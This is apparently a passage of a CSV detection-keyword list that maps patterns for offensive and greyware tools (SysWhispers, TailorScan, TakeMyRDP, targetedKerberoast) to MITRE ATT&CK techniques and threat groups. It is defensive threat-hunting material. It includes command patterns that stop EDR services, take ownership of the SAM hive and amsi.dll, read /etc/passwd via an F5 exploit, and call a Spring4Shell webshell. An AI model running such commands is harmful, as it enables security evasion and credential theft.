This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.,T1055 - T1070.004 - T1218.011,TA0007 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://attack.mitre.org/techniques/T1562/001/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*systemctl start nessusd*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*systemctl stop cbdaemon*,greyware_tool_keyword,systemctl,Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.,T1055 - T1070.004 - T1218.011,TA0007 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://attack.mitre.org/techniques/T1562/001/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*systemctl stop falcon-sensor.service*,greyware_tool_keyword,systemctl,Adversaries may disable security tools to avoid possible detection of their tools and activities. 
This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.,T1055 - T1070.004 - T1218.011,TA0007 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://attack.mitre.org/techniques/T1562/001/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*SysWhispers.git *,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/InlineWhispers,1,0,N/A,10,10,286,42,2021-11-09T15:39:27Z,2020-12-25T16:52:50Z -*syswhispers.py*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/InlineWhispers,1,1,N/A,10,10,286,42,2021-11-09T15:39:27Z,2020-12-25T16:52:50Z -*syswhispers.py*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - 
Chimera - APT29,C2,https://github.com/Sh0ckFR/InlineWhispers2,1,1,N/A,10,10,172,29,2022-07-21T08:40:05Z,2021-11-16T12:47:35Z -*syswhispers.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*syswhispers.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*syswhispers.py*,offensive_tool_keyword,SysWhispers3,SysWhispers on Steroids - AV/EDR evasion via direct system calls.,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/klezVirus/SysWhispers3,1,1,N/A,N/A,10,1006,148,2023-03-22T19:23:21Z,2022-03-07T18:56:21Z -*SysWhispers2*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens 
- Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Sh0ckFR/InlineWhispers2,1,1,N/A,10,10,172,29,2022-07-21T08:40:05Z,2021-11-16T12:47:35Z -*syswhispersv2_x86*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*-t * -x lfr -f /etc/passwd*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/dunderhay/CVE-2020-5902,1,0,N/A,N/A,1,37,8,2023-10-03T01:42:19Z,2020-07-06T04:03:58Z -*-t * -x rce -a list+auth+user+admin*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/dunderhay/CVE-2020-5902,1,0,N/A,N/A,1,37,8,2023-10-03T01:42:19Z,2020-07-06T04:03:58Z -*T0XlCv1.rule*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*t3l3machus/BabelStrike*,offensive_tool_keyword,BabelStrike,The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. 
from Linkedin),T1078 - T1114,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/t3l3machus/BabelStrike,1,1,N/A,1,1,38,13,2023-09-12T13:49:30Z,2023-01-10T07:59:00Z -*t3l3machus/Synergy-httpx*,offensive_tool_keyword,Synergy-httpx,A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically,T1021.002 - T1105 - T1090,TA0002 - TA0011 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/t3l3machus/Synergy-httpx,1,1,N/A,8,2,108,14,2023-09-09T10:38:38Z,2023-06-02T10:06:41Z -*TailorScan.exe *,offensive_tool_keyword,cobaltstrike,Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/uknowsec/TailorScan,1,0,N/A,10,10,269,49,2020-11-12T08:29:11Z,2020-11-09T07:38:16Z -*TailorScan_darwin*,offensive_tool_keyword,cobaltstrike,Self-use suture monster intranet scanner - supports 
port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/uknowsec/TailorScan,1,1,N/A,10,10,269,49,2020-11-12T08:29:11Z,2020-11-09T07:38:16Z -*TailorScan_freebsd*,offensive_tool_keyword,cobaltstrike,Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/uknowsec/TailorScan,1,1,N/A,10,10,269,49,2020-11-12T08:29:11Z,2020-11-09T07:38:16Z -*TailorScan_linux_*,offensive_tool_keyword,cobaltstrike,Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/uknowsec/TailorScan,1,1,N/A,10,10,269,49,2020-11-12T08:29:11Z,2020-11-09T07:38:16Z -*TailorScan_netbsd_*,offensive_tool_keyword,cobaltstrike,Self-use suture monster intranet scanner - supports port scanning - identifying services - 
getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/uknowsec/TailorScan,1,1,N/A,10,10,269,49,2020-11-12T08:29:11Z,2020-11-09T07:38:16Z -*TailorScan_openbsd_*,offensive_tool_keyword,cobaltstrike,Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 
- T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/uknowsec/TailorScan,1,1,N/A,10,10,269,49,2020-11-12T08:29:11Z,2020-11-09T07:38:16Z -*TailorScan_windows_*.exe*,offensive_tool_keyword,cobaltstrike,Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/uknowsec/TailorScan,1,1,N/A,10,10,269,49,2020-11-12T08:29:11Z,2020-11-09T07:38:16Z -*tailscale up --advertise-routes=*/24*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - 
T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*tailscaled --tun=userspace-networking --socks5-server=*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*take_shellcode.bat*,offensive_tool_keyword,WinShellcode,It's a C code project created in Visual Studio that helps you generate shellcode from your C code.,T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/DallasFR/WinShellcode,1,1,N/A,N/A,,N/A,,, -*TakeMyRDP*logfile.txt*,offensive_tool_keyword,TakeMyRDP,An updated version of keystroke logger targeting the Remote Desktop Protocol (RDP) related processes,T1056.001 - T1021.001 - T1057,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/nocerainfosec/TakeMyRDP2.0,1,1,N/A,N/A,1,95,8,2023-07-27T03:10:08Z,2023-07-03T12:48:49Z -*TakeMyRDP.cpp*,offensive_tool_keyword,TakeMyRDP,A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes,T1056.001 - T1021.001 - T1057,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/TheD1rkMtr/TakeMyRDP,1,1,N/A,N/A,3,278,56,2023-08-02T02:23:28Z,2023-07-02T17:25:33Z -*TakeMyRDP.exe*,offensive_tool_keyword,TakeMyRDP,A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes,T1056.001 - T1021.001 - T1057,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/TheD1rkMtr/TakeMyRDP,1,1,N/A,N/A,3,278,56,2023-08-02T02:23:28Z,2023-07-02T17:25:33Z 
-*TakeMyRDP.git*,offensive_tool_keyword,TakeMyRDP,A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes,T1056.001 - T1021.001 - T1057,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/TheD1rkMtr/TakeMyRDP,1,1,N/A,N/A,3,278,56,2023-08-02T02:23:28Z,2023-07-02T17:25:33Z -*TakeMyRDP.h*,offensive_tool_keyword,TakeMyRDP,An updated version of keystroke logger targeting the Remote Desktop Protocol (RDP) related processes,T1056.001 - T1021.001 - T1057,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/nocerainfosec/TakeMyRDP2.0,1,1,N/A,N/A,1,95,8,2023-07-27T03:10:08Z,2023-07-03T12:48:49Z -*TakeMyRDP.sln*,offensive_tool_keyword,TakeMyRDP,A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes,T1056.001 - T1021.001 - T1057,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/TheD1rkMtr/TakeMyRDP,1,1,N/A,N/A,3,278,56,2023-08-02T02:23:28Z,2023-07-02T17:25:33Z -*TakeMyRDP.vcxproj*,offensive_tool_keyword,TakeMyRDP,A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes,T1056.001 - T1021.001 - T1057,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/TheD1rkMtr/TakeMyRDP,1,1,N/A,N/A,3,278,56,2023-08-02T02:23:28Z,2023-07-02T17:25:33Z -*TakeMyRDP2.0*,offensive_tool_keyword,TakeMyRDP,An updated version of keystroke logger targeting the Remote Desktop Protocol (RDP) related processes,T1056.001 - T1021.001 - T1057,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/nocerainfosec/TakeMyRDP2.0,1,1,N/A,N/A,1,95,8,2023-07-27T03:10:08Z,2023-07-03T12:48:49Z -*TakeMyRDP-main*,offensive_tool_keyword,TakeMyRDP,A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes,T1056.001 - T1021.001 - T1057,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/TheD1rkMtr/TakeMyRDP,1,1,N/A,N/A,3,278,56,2023-08-02T02:23:28Z,2023-07-02T17:25:33Z -"*takeown /f 
""C:\windows\system32\config\SAM""*",greyware_tool_keyword,takeown,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z
-*takeown /f C:\Windows\System32\amsi.dll /a*,greyware_tool_keyword,takeown,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin,1,0,N/A,10,8,N/A,N/A,N/A,N/A
-*takeshixx/nmap-scripts*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,1,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z
-*Taonn/EmailAll*,offensive_tool_keyword,EmailAll,EmailAll is a powerful Email Collect tool,T1114.001 - T1113 - T1087.003,TA0009 - TA0003,N/A,N/A,Reconnaissance,https://github.com/Taonn/EmailAll,1,1,N/A,6,6,577,101,2022-03-04T10:36:41Z,2022-02-14T06:55:30Z
-*target/tomcatwar.jsp?pwd=j&cmd=*,offensive_tool_keyword,spring-core-rce,CVE-2022-22965 : about spring core rce,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Mr-xn/spring-core-rce,1,0,N/A,N/A,1,54,18,2022-04-01T15:34:03Z,2022-03-30T14:35:00Z
-*targetedKerberoast.git*,offensive_tool_keyword,targetedKerberoast,Kerberoast with ACL abuse capabilities,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/ShutdownRepo/targetedKerberoast,1,1,N/A,N/A,3,254,43,2023-07-16T22:06:29Z,2021-08-02T20:19:35Z
-*targetedKerberoast.py*,offensive_tool_keyword,targetedKerberoast,Kerberoast with ACL abuse capabilities,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/ShutdownRepo/targetedKerberoast,1,1,N/A,N/A,3,254,43,2023-07-16T22:06:29Z,2021-08-02T20:19:35Z
-*targetedkerberoast_attack*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-*targetedkerberoast_hashes_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-*targetedkerberoast_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-*targetedKerberoast-main*,offensive_tool_keyword,targetedKerberoast,Kerberoast with ACL abuse capabilities,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/ShutdownRepo/targetedKerberoast,1,1,N/A,N/A,3,254,43,2023-07-16T22:06:29Z,2021-08-02T20:19:35Z
-*targetver.h*,offensive_tool_keyword,POC,CVE-2022-21882 win32k LPE bypass CVE-2021-1732,T1068,TA0004,N/A,N/A,Exploitation tools,https://github.com/KaLendsi/CVE-2022-21882,1,0,N/A,N/A,5,454,142,2022-01-27T04:18:18Z,2022-01-27T03:44:10Z
